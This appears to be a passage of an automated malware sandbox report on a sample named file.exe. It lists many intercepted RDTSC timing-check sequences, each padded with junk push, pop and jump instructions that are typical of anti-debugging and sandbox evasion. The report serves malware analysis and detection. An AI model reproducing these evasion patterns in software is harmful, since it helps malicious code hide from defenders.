              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA4D1 second address: 11EA4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA4D5 second address: 11EA50F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD7F8BAA156h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ecx 0x0000000e push eax 0x0000000f jmp 00007FD7F8BAA161h 0x00000014 jmp 00007FD7F8BAA166h 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1293D18 second address: 1293D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1293D1E second address: 1293D2C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1293D2C second address: 1293D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1293D30 second address: 1293D39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1293ED1 second address: 1293ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1293ED7 second address: 1293EDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294061 second address: 1294079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129420F second address: 1294235 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FD7F8BAA16Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007FD7F8BAA166h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294235 second address: 129423A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129423A second address: 1294240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12944DB second address: 12944DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12944DF second address: 12944EE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129464C second address: 1294671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD7F8DB51EEh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FD7F8DB51E6h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294671 second address: 1294677 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A574 second address: 129A590 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FD7F8DB51F6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A590 second address: 129A5D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FD7F8BAA156h 0x00000009 je 00007FD7F8BAA156h 0x0000000f jbe 00007FD7F8BAA156h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007FD7F8BAA163h 0x00000024 popad 0x00000025 jmp 00007FD7F8BAA161h 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A727 second address: 129A72E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A72E second address: 129A739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A739 second address: 129A73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A73D second address: 129A75B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD7F8BAA160h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A75B second address: 129A75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A75F second address: 129A763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A763 second address: 129A769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129AA19 second address: 129AA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129AA1D second address: 129AA21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129ACDF second address: 129ACE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129ACE5 second address: 129AD0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD7F8DB51F8h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129AFE3 second address: 129AFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129AFED second address: 129AFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push ebx 0x00000008 jne 00007FD7F8DB51E6h 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299D2F second address: 1299D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299D34 second address: 1299D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7F8DB51F2h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299D4A second address: 1299D7D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD7F8BAA163h 0x0000000c jmp 00007FD7F8BAA165h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A1946 second address: 12A194C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A4A37 second address: 12A4A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A4A3F second address: 12A4A6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51EDh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FD7F8DB51F1h 0x00000013 pop eax 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A4756 second address: 12A4766 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD7F8BAA156h 0x00000008 jnp 00007FD7F8BAA156h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B107D second address: 12B109C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD7F8DB51E6h 0x00000008 jmp 00007FD7F8DB51EBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007FD7F8DB51EEh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B11D7 second address: 12B1201 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FD7F8BAA165h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD7F8BAA15Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1201 second address: 12B1205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1205 second address: 12B121A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA15Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B121A second address: 12B1220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1220 second address: 12B1226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B3649 second address: 12B364F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B364F second address: 12B365F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7F8BAA15Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BA6B0 second address: 12BA6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BA6B7 second address: 12BA6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD60E second address: 12BD612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7954 second address: 12C795E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD7F8BAA162h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CE815 second address: 12CE81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD470 second address: 12CD474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD5F0 second address: 12CD5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD7F8DB51E6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD87A second address: 12CD880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDA05 second address: 12CDA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDA09 second address: 12CDA40 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jg 00007FD7F8BAA156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD7F8BAA165h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD7F8BAA162h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDA40 second address: 12CDA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDA44 second address: 12CDA6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA161h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jo 00007FD7F8BAA162h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDA6B second address: 12CDA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD7F8DB51E6h 0x0000000a jmp 00007FD7F8DB51EAh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDA83 second address: 12CDA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D3599 second address: 12D35A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3685 second address: 12E368B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E368B second address: 12E3691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3691 second address: 12E3696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E354E second address: 12E3552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3552 second address: 12E3558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E4EBD second address: 12E4EC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E4EC1 second address: 12E4EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD7F8BAA160h 0x0000000b popad 0x0000000c push esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DE112 second address: 12DE15D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c jmp 00007FD7F8DB51EFh 0x00000011 jns 00007FD7F8DB51F6h 0x00000017 popad 0x00000018 push esi 0x00000019 jmp 00007FD7F8DB51F4h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DE15D second address: 12DE163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13086B1 second address: 13086B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13086B7 second address: 13086BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13074FC second address: 1307533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FD7F8DB51EAh 0x00000012 jmp 00007FD7F8DB51F6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307533 second address: 1307538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307538 second address: 130753E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13077E5 second address: 13077EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13077EB second address: 13077F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13077F6 second address: 13077FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307AF9 second address: 1307B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD7F8DB51F1h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307B12 second address: 1307B26 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e js 00007FD7F8BAA156h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307B26 second address: 1307B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307B2A second address: 1307B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307DE5 second address: 1307DF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7F8DB51EEh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307F68 second address: 1307F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD7F8BAA156h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307F74 second address: 1307F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7F8DB51F7h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13080FC second address: 1308100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309CE2 second address: 1309CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309CE8 second address: 1309CFE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD7F8BAA156h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FD7F8BAA156h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309CFE second address: 1309D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309D02 second address: 1309D06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C558 second address: 130C55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C55C second address: 130C571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C571 second address: 130C576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C8D3 second address: 130C8D9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C8D9 second address: 130C90E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b or dl, 00000056h 0x0000000e push 00000004h 0x00000010 movsx edx, bx 0x00000013 call 00007FD7F8DB51E9h 0x00000018 jng 00007FD7F8DB51EAh 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FD7F8DB51ECh 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C90E second address: 130C920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7F8BAA15Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C920 second address: 130C939 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD7F8DB51E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push ecx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C939 second address: 130C93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130F48B second address: 130F491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0247 second address: 51F024D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F024D second address: 51F0251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0251 second address: 51F0255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
